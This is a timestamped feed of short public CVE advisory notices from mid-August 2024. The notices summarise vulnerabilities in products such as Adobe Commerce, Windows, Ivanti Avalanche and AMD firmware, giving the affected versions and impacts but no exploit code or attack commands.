|
| 2024-08-14 15:37:33 |
🚨 CVE-2023-21237In applyRemoteView of NotificationContentInflater.java, there is a possible way to hide foreground service notification due to misleading or insufficient UI. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-251586912🎖@cveNotify |
|
| 2024-08-14 15:37:32 |
🚨 CVE-2023-29336Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-14 15:37:31 |
🚨 CVE-2023-28229Windows CNG Key Isolation Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-14 15:37:30 |
🚨 CVE-2023-23752An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.🎖@cveNotify |
|
| 2024-08-14 15:37:26 |
🚨 CVE-2022-2856Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 104.0.5112.101 allowed a remote attacker to arbitrarily browse to a malicious website via a crafted HTML page.🎖@cveNotify |
|
| 2024-08-14 15:37:25 |
🚨 CVE-2022-22948The vCenter Server contains an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.🎖@cveNotify |
|
| 2024-08-14 15:07:44 |
🚨 CVE-2024-39413Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and disclose minor information. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-08-14 15:07:43 |
🚨 CVE-2024-39411Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and disclose minor information. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-08-14 15:07:42 |
🚨 CVE-2024-39409Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by a Cross-Site Request Forgery (CSRF) vulnerability that could allow an attacker to bypass security features and perform minor unauthorised actions on behalf of a user. The vulnerability could be exploited by tricking a victim into clicking a link or loading a page that submits a malicious request. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2024-08-14 15:07:38 |
🚨 CVE-2024-39406Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to gain access to files and directories that are outside the restricted directory. Exploitation of this issue does not require user interaction and scope is changed.🎖@cveNotify |
|
| 2024-08-14 15:07:37 |
🚨 CVE-2024-39404Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and modify minor information. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-08-14 15:07:33 |
🚨 CVE-2024-39402Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an admin attacker. Exploitation of this issue requires user interaction and scope is changed.🎖@cveNotify |
|
| 2024-08-14 15:07:32 |
🚨 CVE-2024-39400Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an admin attacker to inject and execute arbitrary JavaScript code within the context of the user's browser session. Exploitation of this issue requires user interaction, such as convincing a victim to click on a malicious link. Confidentiality and integrity impact is high as it affects other admin accounts.🎖@cveNotify |
|
| 2024-08-14 15:07:31 |
🚨 CVE-2024-39399Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. A low-privileged attacker could exploit this vulnerability to gain access to files and directories that are outside the restricted directory. Exploitation of this issue does not require user interaction and scope is changed.🎖@cveNotify |
|
| 2024-08-14 15:07:27 |
🚨 CVE-2024-39397Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Unrestricted Upload of File with Dangerous Type vulnerability that could result in arbitrary code execution by an attacker. An attacker could exploit this vulnerability by uploading a malicious file which can then be executed on the server. Exploitation of this issue does not require user interaction, but attack complexity is high and scope is changed.🎖@cveNotify |
|
| 2024-08-14 15:07:26 |
🚨 CVE-2024-38213Windows Mark of the Web Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-08-14 15:07:25 |
🚨 CVE-2012-4792Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.🎖@cveNotify |
|
| 2024-08-14 14:07:48 |
🚨 CVE-2024-5894A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file manage_product.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-268138 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-14 14:07:44 |
🚨 CVE-2024-1659Arbitrary File Upload vulnerability in MegaBIP software allows attacker to upload any file to the server (including a PHP code file) without an authentication. This issue affects MegaBIP software versions through 5.10.🎖@cveNotify |
|
| 2024-08-14 14:07:43 |
🚨 CVE-2024-1576SQL Injection vulnerability in MegaBIP software allows attacker to obtain site administrator privileges, including access to the administration panel and the ability to change the administrator password. This issue affects MegaBIP software versions through 5.09.🎖@cveNotify |
|
| 2024-08-14 14:07:42 |
🚨 CVE-2024-5313CWE-668: Exposure of the Resource Wrong Sphere vulnerability exists that exposes a SSHinterface over the product network interface. This does not allow to directly exploit the product ormake any unintended operation as the SSH interface access is protected by an authenticationmechanism. Impacts are limited to port scanning and fingerprinting activities as well as attemptsto perform a potential denial of service attack on the exposed SSH interface.🎖@cveNotify |
|
| 2024-08-14 13:37:26 |
🚨 CVE-2024-33535An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. The vulnerability involves unauthenticated local file inclusion (LFI) in a web application, specifically impacting the handling of the packages parameter. Attackers can exploit this flaw to include arbitrary local files without authentication, potentially leading to unauthorized access to sensitive information. The vulnerability is limited to files within a specific directory.🎖@cveNotify |
|
| 2024-08-14 13:37:25 |
🚨 CVE-2024-27443An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. A Cross-Site Scripting (XSS) vulnerability exists in the CalendarInvite feature of the Zimbra webmail classic user interface, because of improper input validation in the handling of the calendar header. An attacker can exploit this via an email message containing a crafted calendar header with an embedded XSS payload. When a victim views this message in the Zimbra webmail classic interface, the payload is executed in the context of the victim's session, potentially leading to execution of arbitrary JavaScript code.🎖@cveNotify |
|
| 2024-08-14 13:37:24 |
🚨 CVE-2024-25949Dell OS10 Networking Switches, versions10.5.6.x, 10.5.5.x, 10.5.4.x and 10.5.3.x ,contain an improper authorization vulnerability. A remote authenticated attacker could potentially exploit this vulnerability leading to escalation of privileges.🎖@cveNotify |
|
| 2024-08-14 13:07:43 |
🚨 CVE-2024-41862Substance3D - Sampler versions 4.5 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-14 13:07:37 |
🚨 CVE-2024-41861Substance3D - Sampler versions 4.5 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-14 13:07:36 |
🚨 CVE-2024-7732Dr.ID Access Control System from SECOM does not properly validate a specific page parameter, allowing unauthenticated remote attackers to inject SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-08-14 13:07:35 |
🚨 CVE-2024-7731Dr.ID Access Control System from SECOM does not properly validate a specific page parameter, allowing unauthenticated remote attackers to inject SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-08-14 13:07:32 |
🚨 CVE-2024-7588The Gutenberg Blocks, Page Builder – ComboBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion block in all versions up to, and including, 2.2.87 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-14 13:07:31 |
🚨 CVE-2024-7728The specific CGI of the CAYIN Technology CMS does not properly validate user input, allowing a remote attacker with administrator privileges to inject OS commands into the specific parameter and execute them on the remote server.🎖@cveNotify |
|
| 2024-08-14 13:07:30 |
🚨 CVE-2024-38652Path traversal in the skin management component of Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to achieve denial of service via arbitrary file deletion.🎖@cveNotify |
|
| 2024-08-14 13:07:27 |
🚨 CVE-2024-37399A NULL pointer dereference in WLAvalancheService in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to crash the service, resulting in a DoS.🎖@cveNotify |
|
| 2024-08-14 13:07:26 |
🚨 CVE-2024-36136An off-by-one error in WLInfoRailService in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to crash the service, resulting in a DoS.🎖@cveNotify |
|
| 2024-08-14 13:07:25 |
🚨 CVE-2024-20083In venc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08810810 / ALPS08805789; Issue ID: MSV-1502.🎖@cveNotify |
|
| 2024-08-14 13:07:24 |
🚨 CVE-2024-20082In Modem, there is a possible memory corruption due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01182594; Issue ID: MSV-1529.🎖@cveNotify |
|
| 2024-08-14 12:37:42 |
🚨 CVE-2024-39415Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and disclose minor information. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-08-14 12:37:41 |
🚨 CVE-2024-39413Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and disclose minor information. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-08-14 12:37:40 |
🚨 CVE-2024-39412Adobe Commerce versions 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and disclose minor information. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-08-14 10:37:25 |
🚨 CVE-2024-38483Dell BIOS contains an Improper Input Validation vulnerability in an externally developed component. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution.🎖@cveNotify |
|
| 2024-08-14 10:37:24 |
🚨 CVE-2024-0169Dell Unity, version(s) 5.3 and prior, contain(s) an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure.🎖@cveNotify |
|
| 2024-08-14 09:37:32 |
🚨 CVE-2024-41864Substance3D - Designer versions 13.1.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-14 09:37:26 |
🚨 CVE-2024-41863Substance3D - Sampler versions 4.5 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-14 09:37:25 |
🚨 CVE-2024-41860Substance3D - Sampler versions 4.5 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-14 09:37:24 |
🚨 CVE-2024-41858InCopy versions 18.5.2, 19.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-14 07:37:25 |
🚨 CVE-2024-7732Dr.ID Access Control System from SECOM does not properly validate a specific page parameter, allowing unauthenticated remote attackers to inject SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-08-14 07:37:24 |
🚨 CVE-2024-7731Dr.ID Access Control System from SECOM does not properly validate a specific page parameter, allowing unauthenticated remote attackers to inject SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-08-14 05:37:25 |
🚨 CVE-2024-7588The Gutenberg Blocks, Page Builder – ComboBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion block in all versions up to, and including, 2.2.87 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-14 05:37:24 |
🚨 CVE-2024-21302Summary:Microsoft was notified that an elevation of privilege vulnerability exists in Windows based systems supporting Virtualization Based Security (VBS), including a subset of Azure Virtual Machine SKUS. This vulnerability enables an attacker with administrator privileges to replace current versions of Windows system files with outdated versions. By exploiting this vulnerability, an attacker could reintroduce previously mitigated vulnerabilities, circumvent some features of VBS, and exfiltrate data protected by VBS.Microsoft is developing a security update to mitigate this threat, but it is not yet available. Guidance to help customers reduce the risks associated with this vulnerability and to protect their systems until the mitigation is available in a Windows security update is provided in the Recommended Actions section of this CVE.This CVE will be updated when the mitigation is available in a Windows security update. We highly encourage customers to subscribe to Security Update Guide notifications to receive an alert when this update occurs.Update: August 13, 2024Microsoft has released the August 2024 security updates that include an opt-in revocation policy mitigation to address this vulnerability. Customers running affected versions of Windows are encouraged to review KB5042562: Guidance for blocking rollback of virtualization-based security related updates to assess if this opt-in policy meets the needs of their environment before implementing this mitigation. There are risks associated with this mitigation that should be understood prior to applying it to your systems. Detailed information about these risks is also available in KB5042562.Details:A security researcher informed Microsoft of an elevation of privilege vulnerability in Windows 10, Windows 11, Windows Server 2016, and higher based systems including Azure Virtual Machines (VM) that support VBS. For more information on Windows versions and VM SKUs supporting VBS, reference: Virtualization-based Security (VBS) | Microsoft Learn.The vulnerability enables an attacker with administrator privileges on the target system to replace current Windows system files with outdated versions. Successful exploitation provides an attacker with the ability to reintroduce previously mitigated vulnerabilities, circumvent VBS security features, and exfiltrate data protected by VBS.Microsoft is developing a security update that will revoke outdated, unpatched VBS system files to mitigate this vulnerability, but it is not yet available. Due to the complexity of blocking such a large quantity of files, rigorous testing is required to avoid integration failures or regressions. This CVE will be updated with new information and links to security updates once available. For more information see Microsoft Technical Security Notifications and Security Update Guide Notification System News: Create your profile now – Microsoft Security Response CenterMicrosoft is not aware of any attempts to exploit this vulnerability. However, a public presentation regarding this vulnerability was hosted at BlackHat on August 7, 2024. The presentation was appropriately coordinated with Microsoft but may change the threat landscape. Customers concerned with these risks should reference the guidance provided in the Recommended Actions section to protect their systems.Recommended Actions:Microsoft has released an opt-in mitigation available as an interim solution to help protect customers concerned about this vulnerability until the final mitigation is available in a security update.For Windows 10 1809 and later, Windows 11 version 21H2 and later, and Windows Server 2019 and later, administrators can deploy a Microsoft-signed revocation policy (SkuSiPolicy.p7b) to block vulnerable, unpatched versions of VBS system files from being loaded by the operating system. For more information, refer to KB5042562: Guidance for blocking rollback of virtualization-based security related...🎖@cveNotify |
|
| 2024-08-14 04:37:25 |
🚨 CVE-2024-7729The CAYIN Technology CMS lacks proper access control, allowing unauthenticated remote attackers to download arbitrary CGI files.🎖@cveNotify |
|
| 2024-08-14 04:37:24 |
🚨 CVE-2024-7728The specific CGI of the CAYIN Technology CMS does not properly validate user input, allowing a remote attacker with administrator privileges to inject OS commands into the specific parameter and execute them on the remote server.🎖@cveNotify |
|
| 2024-08-14 03:37:32 |
🚨 CVE-2024-38652Path traversal in the skin management component of Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to achieve denial of service via arbitrary file deletion.🎖@cveNotify |
|
| 2024-08-14 03:37:26 |
🚨 CVE-2024-37399A NULL pointer dereference in WLAvalancheService in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to crash the service, resulting in a DoS.🎖@cveNotify |
|
| 2024-08-14 03:37:25 |
🚨 CVE-2024-20083In venc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08810810 / ALPS08805789; Issue ID: MSV-1502.🎖@cveNotify |
|
| 2024-08-14 03:37:24 |
🚨 CVE-2024-20082In Modem, there is a possible memory corruption due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01182594; Issue ID: MSV-1529.🎖@cveNotify |
|
| 2024-08-14 02:07:47 |
🚨 CVE-2023-31304Improper input validation in SMU may allow an attacker with privileges and a compromised physical function (PF) to modify the PCIe® lane count and speed, potentially leading to a loss of availability.🎖@cveNotify |
|
| 2024-08-14 02:07:41 |
🚨 CVE-2023-20591Improper re-initialization of IOMMU during the DRTM eventmay permit an untrusted platform configuration to persist, allowing an attackerto read or modify hypervisor memory, potentially resulting in loss ofconfidentiality, integrity, and availability.🎖@cveNotify |
|
| 2024-08-14 02:07:40 |
🚨 CVE-2023-20518Incomplete cleanup in the ASP may expose the Master Encryption Key (MEK) to a privileged attacker with access to the BIOS menu or UEFI shell and a memory exfiltration vulnerability, potentially resulting in loss of confidentiality.🎖@cveNotify |
|
| 2024-08-14 02:07:39 |
🚨 CVE-2023-20513An insufficient bounds check in PMFW (Power Management Firmware) may allow an attacker to utilize a malicious VF (virtualization function) to send a malformed message, potentially resulting in a denial of service.🎖@cveNotify |
|
| 2024-08-14 02:07:35 |
🚨 CVE-2023-20510An insufficient DRAM address validation in PMFW may allow a privileged attacker to read from an invalid DRAM address to SRAM, potentially resulting in data corruption or denial of service.🎖@cveNotify |
|
| 2024-08-14 02:07:34 |
🚨 CVE-2022-23815Improper bounds checking in APCB firmware may allow an attacker to perform an out of bounds write, corrupting the APCB entry, potentially leading to arbitrary code execution.🎖@cveNotify |
|
| 2024-08-14 02:07:29 |
🚨 CVE-2021-46746Lack of stack protection exploit mechanisms in ASP Secure OS Trusted Execution Environment (TEE) may allow a privileged attacker with access to AMD signingkeys to c006Frrupt the return address, causing astack-based buffer overrun, potentially leading to a denial of service.🎖@cveNotify |
|
| 2024-08-14 02:07:28 |
🚨 CVE-2021-26344An out of bounds memory write when processing the AMDPSP1 Configuration Block (APCB) could allow an attacker with access the abilityto modify the BIOS image, and the ability to sign the resulting image, topotentially modify the APCB block resulting in arbitrary code execution.🎖@cveNotify |
|
| 2024-08-14 01:37:25 |
🚨 CVE-2024-7754A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /ajax/check_medicine_name.php. The manipulation of the argument user_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-14 01:37:24 |
🚨 CVE-2024-7753A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user_images/. The manipulation leads to direct request. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-14 01:07:29 |
🚨 CVE-2024-38213Windows Mark of the Web Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-08-14 01:07:26 |
🚨 CVE-2024-38189Microsoft Project Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-14 01:07:25 |
🚨 CVE-2024-38107Windows Power Dependency Coordinator Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-14 01:07:24 |
🚨 CVE-2024-38106Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-14 00:37:35 |
🚨 CVE-2024-7752A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /update_medicine.php. The manipulation of the argument medicine_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-14 00:37:31 |
🚨 CVE-2024-28986SolarWinds Web Help Desk was found to be susceptible to a Java Deserialization Remote Code Execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. While it was reported as an unauthenticated vulnerability, SolarWinds has been unable to reproduce it without authentication after thorough testing. However, out of an abundance of caution, we recommend all Web Help Desk customers apply the patch, which is now available.🎖@cveNotify |
|
| 2024-08-14 00:37:30 |
🚨 CVE-2024-38166An unauthenticated attacker can exploit improper neutralization of input during web page generation in Microsoft Dynamics 365 to spoof over a network by tricking a user to click on a link.🎖@cveNotify |
|
| 2024-08-13 23:37:32 |
🚨 CVE-2024-7751A vulnerability was found in SourceCodester Clinics Patient Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /update_medicine.php. The manipulation of the argument hidden_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-13 23:37:26 |
🚨 CVE-2024-7750A vulnerability has been found in SourceCodester Clinics Patient Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /medicines.php. The manipulation of the argument medicine_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-13 23:37:25 |
🚨 CVE-2024-38182Weak authentication in Microsoft Dynamics 365 allows an unauthenticated attacker to elevate privileges over a network.🎖@cveNotify |
|
| 2024-08-13 23:37:24 |
🚨 CVE-2024-38164An improper access control vulnerability in GroupMe allows an a unauthenticated attacker to elevate privileges over a network by convincing a user to click on a malicious link.🎖@cveNotify |
|
| 2024-08-13 22:37:25 |
🚨 CVE-2024-38109An authenticated attacker can exploit an Server-Side Request Forgery (SSRF) vulnerability in Microsoft Azure Health Bot to elevate privileges over a network.🎖@cveNotify |
|
| 2024-08-13 22:37:24 |
🚨 CVE-2024-38166An unauthenticated attacker can exploit improper neutralization of input during web page generation in Microsoft Dynamics 365 to spoof over a network by tricking a user to click on a link.🎖@cveNotify |
|
| 2024-08-13 21:37:26 |
🚨 CVE-2024-7743A vulnerability was found in wanglongcn ltcms 1.0.20. It has been declared as critical. Affected by this vulnerability is the function downloadUrl of the file /api/file/downloadUrl of the component API Endpoint. The manipulation of the argument file leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-13 21:37:25 |
🚨 CVE-2024-39091An OS command injection vulnerability in the ccm_debug component of MIPC Camera firmware prior to v5.4.1.240424171021 allows attackers within the same network to execute arbitrary code via a crafted HTML request.🎖@cveNotify |
|
| 2024-08-13 21:37:24 |
🚨 CVE-2024-24027SQL Injection vulnerability in Likeshop before 2.5.7 allows attackers to run abitrary SQL commands via the function DistributionMemberLogic::getFansLists.🎖@cveNotify |
|
| 2024-08-13 20:37:32 |
🚨 CVE-2024-36877Micro-Star International Z-series motherboards (Z590, Z490, and Z790) and B-series motherboards (B760, B560, B660, and B460) with firmware 7D25v14, 7D25v17 to 7D25v19, and 7D25v1A to 7D25v1H was discovered to contain a write-what-where condition in the in the SW handler for SMI 0xE3.🎖@cveNotify |
|
| 2024-08-13 20:37:26 |
🚨 CVE-2024-33620Absolute path traversal vulnerability exists in ID Link Manager and FUJITSU Software TIME CREATOR. If this vulnerability is exploited, the file contents including sensitive information on the server may be retrieved by an unauthenticated remote attacker.🎖@cveNotify |
|
| 2024-08-13 20:37:25 |
🚨 CVE-2023-52047Dedecms v5.7.112 was discovered to contain a Cross-Site Request Forgery (CSRF) in the file manager.🎖@cveNotify |
|
| 2024-08-13 20:37:24 |
🚨 CVE-2023-50379Malicious code injection in Apache Ambari in prior to 2.7.8. Users are recommended to upgrade to version 2.7.8, which fixes this issue.Impact:A Cluster Operator can manipulate the request by adding a malicious code injection and gain a root over the cluster main host.🎖@cveNotify |
|
| 2024-08-13 20:07:24 |
🚨 CVE-2021-28663The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0.🎖@cveNotify |
|
| 2024-08-13 19:37:32 |
🚨 CVE-2024-25830F-logic DataCube3 v1.0 is vulnerable to Incorrect Access Control due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the configuration file. A successful exploit could allow the attacker to extract the root and admin password.🎖@cveNotify |
|
| 2024-08-13 19:37:26 |
🚨 CVE-2024-24149A memory leak issue discovered in parseSWF_GLYPHENTRY in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.🎖@cveNotify |
|
| 2024-08-13 19:37:25 |
🚨 CVE-2019-7256Linear eMerge E3-Series devices allow Command Injections.🎖@cveNotify |
|
| 2024-08-13 19:37:24 |
🚨 CVE-2014-100005Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DIR-600 router (rev. Bx) with firmware before 2.17b02 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account or (2) enable remote management via a crafted configuration module to hedwig.cgi, (3) activate new configuration settings via a SETCFG,SAVE,ACTIVATE action to pigwidgeon.cgi, or (4) send a ping via a ping action to diagnostic.php.🎖@cveNotify |
|
| 2024-08-13 19:07:24 |
🚨 CVE-2011-0611Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a "group of included constants," object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.🎖@cveNotify |
|
| 2024-08-13 18:37:32 |
🚨 CVE-2024-38206An authenticated attacker can bypass Server-Side Request Forgery (SSRF) protection in Microsoft Copilot Studio to leak sensitive information over a network.🎖@cveNotify |
|
| 2024-08-13 18:37:26 |
🚨 CVE-2024-38166An unauthenticated attacker can exploit improper neutralization of input during web page generation in Microsoft Dynamics 365 to spoof over a network by tricking a user to click on a link.🎖@cveNotify |
|
| 2024-08-13 18:37:25 |
🚨 CVE-2024-40776A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 16.7.9 and iPadOS 16.7.9, Safari 17.6, iOS 17.6 and iPadOS 17.6, watchOS 10.6, tvOS 17.6, visionOS 1.3, macOS Sonoma 14.6. Processing maliciously crafted web content may lead to an unexpected process crash.🎖@cveNotify |
|
| 2024-08-13 18:37:24 |
🚨 CVE-2024-29309An issue in Alfresco Content Services v.23.3.0.7 allows a remote attacker to execute arbitrary code via the Transfer Service.🎖@cveNotify |
|
| 2024-08-13 17:37:43 |
🚨 CVE-2024-42625FrogCMS v0.9.5 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/?/layout/add🎖@cveNotify |
|
| 2024-08-13 17:37:37 |
🚨 CVE-2024-39091An OS command injection vulnerability in the ccm_debug component of MIPC Camera firmware prior to v5.4.1.240424171021 allows attackers within the same network to execute arbitrary code via a crafted HTML request.🎖@cveNotify |
|
| 2024-08-13 17:37:36 |
🚨 CVE-2024-42258In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: use !CONFIG_64BIT to relax huge page alignment on 32 bit machinesYves-Alexis Perez reported commit 4ef9ad19e176 ("mm: huge_memory: don'tforce huge page alignment on 32 bit") didn't work for x86_32 [1]. It isbecause x86_32 uses CONFIG_X86_32 instead of CONFIG_32BIT.!CONFIG_64BIT should cover all 32 bit machines.[1] https://lore.kernel.org/linux-mm/CAHbLzkr1LwH3pcTgM+aGQ31ip2bKqiqEQ8=FQB+t2c3dhNKNHA@mail.gmail.com/🎖@cveNotify |
|
| 2024-08-13 17:37:35 |
🚨 CVE-2024-38530The Open eClass platform (formerly known as GUnet eClass) is a complete Course Management System. An arbitrary file upload vulnerability in the "save" functionality of the H5P module enables unauthenticated users to upload arbitrary files on the server's filesystem. This may lead in unrestricted RCE on the backend server, since the upload location is accessible from the internet. This vulnerability is fixed in 3.16.🎖@cveNotify |
|
| 2024-08-13 17:37:32 |
